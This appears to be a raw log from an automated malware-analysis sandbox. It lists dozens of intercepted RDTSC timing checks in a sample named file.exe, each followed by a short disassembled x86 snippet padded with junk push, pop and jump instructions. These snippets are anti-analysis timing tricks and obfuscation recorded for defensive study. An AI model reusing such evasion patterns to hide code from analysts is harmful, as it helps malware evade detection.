Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F63ABD second address: F63AF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FEA44C7ED55h 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 jbe 00007FEA44C7ED46h 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FEA44C7ED4Bh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F63C7D second address: F63C96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA44C4CABDh 0x00000009 js 00007FEA44C4CAB6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F65892 second address: F658AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FEA44C7ED46h 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FEA44C7ED4Ch 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F658AD second address: F658C7 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FEA44C4CAB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007FEA44C4CABAh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F658C7 second address: F658DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FEA44C7ED4Fh 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F741FF second address: F74203 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F74203 second address: F7420D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F7420D second address: F7421D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA44C4CABCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F7421D second address: F74227 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FEA44C7ED46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F74227 second address: F74230 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F7408E second address: F740A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA44C7ED54h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F715D9 second address: F715E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA44C4CABCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F852D7 second address: F8530B instructions: 0x00000000 rdtsc 0x00000002 js 00007FEA44C7ED48h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FEA44C7ED52h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FEA44C7ED51h 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F8530B second address: F8530F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9C44B second address: F9C451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9B716 second address: F9B71A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9B71A second address: F9B724 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FEA44C7ED46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9B724 second address: F9B735 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FEA44C4CABBh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9B735 second address: F9B740 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FEA44C7ED46h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9B8C3 second address: F9B8C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9BD02 second address: F9BD31 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FEA44C7ED4Ch 0x00000008 jmp 00007FEA44C7ED59h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9BD31 second address: F9BD35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9BD35 second address: F9BD39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9BD39 second address: F9BD4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FEA44C4CABEh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FA1BF1 second address: FA1BFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FA1BFA second address: FA1C00 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FA1C00 second address: FA1C06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FA1C06 second address: FA1C16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA44C4CABBh 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FA1C16 second address: FA1C1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBCFF1 second address: EBCFF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBCFF5 second address: EBCFF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBCFF9 second address: EBD007 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FEA44C4CABCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A20349 second address: 4A20375 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA44C7ED51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FEA44C7ED4Eh 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A20375 second address: 4A20379 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A20379 second address: 4A2037F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A2037F second address: 4A203B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, EB81h 0x00000007 mov bh, ah 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov edx, dword ptr [ebp+0Ch] 0x0000000f jmp 00007FEA44C4CAC9h 0x00000014 mov ecx, dword ptr [ebp+08h] 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a mov ecx, 67615899h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A203D6 second address: 4A203DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A203DA second address: 4A203DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A203DE second address: 4A203E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A40710 second address: 4A4071F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA44C4CABBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A4071F second address: 4A4074E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA44C7ED59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FEA44C7ED4Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A4074E second address: 4A40754 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A40754 second address: 4A40758 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A40758 second address: 4A4083A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FEA44C4CAC5h 0x00000011 sbb esi, 387693C6h 0x00000017 jmp 00007FEA44C4CAC1h 0x0000001c popfd 0x0000001d movzx esi, dx 0x00000020 popad 0x00000021 push edx 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007FEA44C4CAC6h 0x00000029 and ch, FFFFFF98h 0x0000002c jmp 00007FEA44C4CABBh 0x00000031 popfd 0x00000032 jmp 00007FEA44C4CAC8h 0x00000037 popad 0x00000038 mov dword ptr [esp], ecx 0x0000003b jmp 00007FEA44C4CAC0h 0x00000040 xchg eax, esi 0x00000041 pushad 0x00000042 mov bh, ah 0x00000044 movsx ebx, ax 0x00000047 popad 0x00000048 push eax 0x00000049 pushad 0x0000004a call 00007FEA44C4CABBh 0x0000004f pop edi 0x00000050 pushfd 0x00000051 jmp 00007FEA44C4CAC4h 0x00000056 add cx, 1EB8h 0x0000005b jmp 00007FEA44C4CABBh 0x00000060 popfd 0x00000061 popad 0x00000062 xchg eax, esi 0x00000063 push eax 0x00000064 push edx 0x00000065 pushad 0x00000066 movsx edi, ax 0x00000069 jmp 00007FEA44C4CABCh 0x0000006e popad 0x0000006f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A4083A second address: 4A40840 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A40840 second address: 4A4085A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FEA44C4CABBh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A4085A second address: 4A4085E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A4085E second address: 4A40864 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A40864 second address: 4A40873 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEA44C7ED4Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A40873 second address: 4A40884 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c movsx edi, cx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A40884 second address: 4A40889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A40889 second address: 4A40929 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA44C4CABFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FEA44C4CAC4h 0x00000013 and eax, 5A082838h 0x00000019 jmp 00007FEA44C4CABBh 0x0000001e popfd 0x0000001f call 00007FEA44C4CAC8h 0x00000024 mov di, cx 0x00000027 pop esi 0x00000028 popad 0x00000029 push dword ptr [ebp+08h] 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007FEA44C4CAC6h 0x00000035 jmp 00007FEA44C4CAC5h 0x0000003a popfd 0x0000003b call 00007FEA44C4CAC0h 0x00000040 pop esi 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A40929 second address: 4A4092F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A40979 second address: 4A40997 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 je 00007FEA44C4CAE1h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FEA44C4CABFh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A409B9 second address: 4A409BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A409BD second address: 4A409C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A409C1 second address: 4A409C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A409C7 second address: 4A409CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A409CD second address: 4A409D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A409D1 second address: 4A40A1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA44C4CABEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FEA44C4CABEh 0x00000013 xor ax, 3B38h 0x00000018 jmp 00007FEA44C4CABBh 0x0000001d popfd 0x0000001e movzx esi, dx 0x00000021 popad 0x00000022 leave 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FEA44C4CABEh 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A40A1C second address: 4A40A22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A40A22 second address: 4A40A26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A40A26 second address: 4A40017 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 retn 0004h 0x0000000b nop 0x0000000c sub esp, 04h 0x0000000f xor ebx, ebx 0x00000011 cmp eax, 00000000h 0x00000014 je 00007FEA44C7EEC8h 0x0000001a xor eax, eax 0x0000001c mov dword ptr [esp], 00000000h 0x00000023 mov dword ptr [esp+04h], 00000000h 0x0000002b call 00007FEA489DCD47h 0x00000030 mov edi, edi 0x00000032 jmp 00007FEA44C7ED4Eh 0x00000037 xchg eax, ebp 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A40017 second address: 4A4001B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A4001B second address: 4A40021 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A40021 second address: 4A4004C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, ax 0x00000006 mov si, 91BDh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f mov ah, dl 0x00000011 mov ax, 19F1h 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 pushad 0x00000018 mov edx, esi 0x0000001a mov cx, EBE5h 0x0000001e popad 0x0000001f mov ebp, esp 0x00000021 pushad 0x00000022 mov esi, 461BB29Dh 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A4004C second address: 4A40050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A40050 second address: 4A40072 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push FFFFFFFEh 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FEA44C4CAC7h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A40072 second address: 4A400CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FEA44C7ED4Fh 0x00000009 adc esi, 1A9A286Eh 0x0000000f jmp 00007FEA44C7ED59h 0x00000014 popfd 0x00000015 mov esi, 2B6165F7h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push 1CE9E085h 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FEA44C7ED55h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A400CB second address: 4A400CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A400CF second address: 4A400D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A400D5 second address: 4A400F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA44C4CABCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 6A737ECDh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A400F2 second address: 4A400F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A400F6 second address: 4A40113 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA44C4CAC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A40113 second address: 4A40134 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 1Fh 0x00000005 mov si, 439Fh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push 1F5153C5h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FEA44C7ED4Eh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A40134 second address: 4A40146 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEA44C4CABEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A40146 second address: 4A401E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA44C7ED4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor dword ptr [esp], 69C478B5h 0x00000012 pushad 0x00000013 mov edx, eax 0x00000015 mov ch, 52h 0x00000017 popad 0x00000018 mov eax, dword ptr fs:[00000000h] 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007FEA44C7ED59h 0x00000025 xor ch, FFFFFF86h 0x00000028 jmp 00007FEA44C7ED51h 0x0000002d popfd 0x0000002e mov si, 9937h 0x00000032 popad 0x00000033 nop 0x00000034 pushad 0x00000035 mov edx, eax 0x00000037 movzx esi, di 0x0000003a popad 0x0000003b push eax 0x0000003c pushad 0x0000003d mov ecx, 2DBA95C3h 0x00000042 mov ecx, 3CA6CB1Fh 0x00000047 popad 0x00000048 nop 0x00000049 jmp 00007FEA44C7ED52h 0x0000004e sub esp, 18h 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007FEA44C7ED57h 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A401E3 second address: 4A40207 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA44C4CAC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A40207 second address: 4A4020B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A4020B second address: 4A4020F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A4020F second address: 4A40215 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A40215 second address: 4A4021B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A4021B second address: 4A4021F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A4021F second address: 4A40242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FEA44C4CAC3h 0x0000000e xchg eax, ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A40242 second address: 4A40246 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A40246 second address: 4A4024C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A4024C second address: 4A40252 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A40252 second address: 4A40256 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A40256 second address: 4A40292 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA44C7ED54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007FEA44C7ED50h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FEA44C7ED4Eh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A40292 second address: 4A40298 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A40298 second address: 4A4029C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
